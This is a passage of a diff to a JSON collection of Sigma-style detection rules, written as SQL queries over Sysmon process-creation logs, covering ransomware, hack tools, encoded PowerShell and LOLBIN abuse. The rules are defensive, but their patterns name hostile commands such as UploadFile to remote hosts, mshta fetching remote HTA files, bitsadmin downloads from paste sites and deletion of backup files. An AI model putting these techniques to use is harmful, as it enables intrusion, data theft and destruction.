'%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE 
'%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_plink_port_forwarding.yml" + "filename": "proc_creation_win_powershell_public_folder.yml" }, { - "title": "PUA - NirCmd Execution As LOCAL SYSTEM", - "id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", - "status": "test", - "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "DLL Sideloading by Microsoft Defender", + "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "status": "experimental", + "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% runassystem %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows 
Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_nircmd_as_system.yml" + "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" }, { - "title": "HackTool - SysmonEOP Execution", - "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", - "status": "experimental", - "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", + "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", + "id": "52ff7941-8211-46f9-84f8-9903efb7077d", + "status": "test", + "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", "author": "Florian Roth (Nextron Systems)", "tags": [ - "cve.2022.41120", - "attack.t1068", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1134.004" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR 
OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sysmoneop.yml" + "filename": "proc_creation_win_hktl_selectmyparent.yml" }, { - "title": "HackTool - RedMimicry Winnti Playbook Execution", - "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", + "title": "Renamed SysInternals DebugView Execution", + "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", - "author": "Alexander Rausch", + "description": "Detects suspicious renamed SysInternals DebugView execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1106", - "attack.t1059.003", - "attack.t1218.011" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE 
'%sigcmm-2.4.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND Image LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" + "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" }, { - "title": "HackTool - PurpleSharp Execution", - "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", + "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", "status": "test", - "description": "Detects the execution of the PurpleSharp adversary simulation tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", + "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1587", - "attack.resource_development" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" + "filename": 
"proc_creation_win_lolbin_manage_bde.yml" }, { - "title": "Potential Ryuk Ransomware Activity", - "id": "c37510b8-2107-4b78-aa32-72f251e7a844", - "status": "stable", - "description": "Detects Ryuk ransomware activity", - "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", + "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "status": "experimental", + "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE 
'%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_ryuk.yml" + "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" }, { - "title": "Potential Baby Shark Malware Activity", - "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", - "status": "test", - "description": "Detects activity that could be related to Baby Shark malware", - "author": "Florian Roth (Nextron Systems)", - "tags": [ + "title": "Wscript Shell Run In CommandLine", + "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "status": "experimental", + "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ "attack.execution", - "attack.defense_evasion", - "attack.discovery", - "attack.t1012", - "attack.t1059.003", - "attack.t1059.001", - "attack.t1218.005" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Rare legitimate inline scripting by some administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_babyshark.yml" + "filename": 
"proc_creation_win_script_wscript_shell_cli.yml" }, { - "title": "Audit Policy Tampering Via Auditpol", - "id": "0a13e132-651d-11eb-ae93-0242ac130002", - "status": "test", - "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "title": "Potential Process Injection Via Msra.EXE", + "id": "744a188b-0415-4792-896f-11ddb0588dbc", + "status": "experimental", + "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", + "author": "Alexander McDonald", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1055" ], "falsepositives": [ - "Administrator or administrator scripts might leverage the flags mentioned in the detection section. 
Either way, it should always be monitored" + "Legitimate use of Msra.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_auditpol_susp_execution.yml" - }, - { - "title": "Potential QBot Activity", - "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", - "status": "stable", - "description": "Detects potential QBot activity by looking for process executions used previously by QBot", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.005" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\route.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_qbot.yml" + "filename": 
"proc_creation_win_msra_process_injection.yml" }, { - "title": "Add SafeBoot Keys Via Reg Utility", - "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", + "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Unlikely" + "Some legitimate apps use this, but limited." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE 
'%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_add_safeboot.yml" + "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" }, { - "title": "TropicTrooper Campaign November 2018", - "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", - "status": "stable", - "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", - "author": "@41thexplorer, Microsoft Defender ATP", + "title": "Suspicious Encoded PowerShell Command Line", + "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", + "status": "test", + "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. 
Emotet)", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", "tags": [ "attack.execution", "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\' OR CommandLine LIKE '% BA^J e-%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '% -ExecutionPolicy remotesigned %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_tropictrooper.yml" + "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" }, { - "title": "Suspicious Debugger Registration Cmdline", - "id": "ae215552-081e-44c7-805f-be16f975c8a2", - "status": "test", - "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Exchange PowerShell Snap-Ins Usage", + "id": "25676e10-2121-446e-80a4-71ff8506af47", + "status": "experimental", + "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. 
As seen used by HAFNIUM and APT27", + "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.008" + "attack.execution", + "attack.t1059.001", + "attack.collection", + "attack.t1114" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" + "filename": "proc_creation_win_powershell_snapins_hafnium.yml" }, { - "title": "Potential CVE-2021-40444 Exploitation Attempt", - "id": "894397c6-da03-425c-a589-3d09e7d1f750", + "title": "HackTool - Koadic Execution", + "id": "5cddf373-ef00-4112-ad72-960ac29bac34", "status": "test", - "description": "Detects potential 
exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", - "author": "Florian Roth (Nextron Systems), @neonprimetime", + "description": "Detects command line parameters used by Koadic hack tool", + "author": "wagga, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444.yml" + "filename": "proc_creation_win_hktl_koadic.yml" }, { - "title": "Suspicious Shells Spawned by Java", - "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", - "status": "experimental", - "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", - "author": "Andreas Hunkeler (@Karneades), Florian Roth", + "title": "NtdllPipe Like Activity Execution", + "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", + "status": "test", + "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. 
As seen being used in the POC NtdllPipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate calls to system binaries", - "Company specific internal usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR 
CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_susp_child_process.yml" + "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" }, { - "title": "Suspicious Serv-U Process Pattern", - "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", - "status": "experimental", - "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Service Path Modification", + "id": "138d3531-8793-4f50-a2cd-f291b2863d78", + "status": "test", + "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", + "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555", - "cve.2021.35211" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - 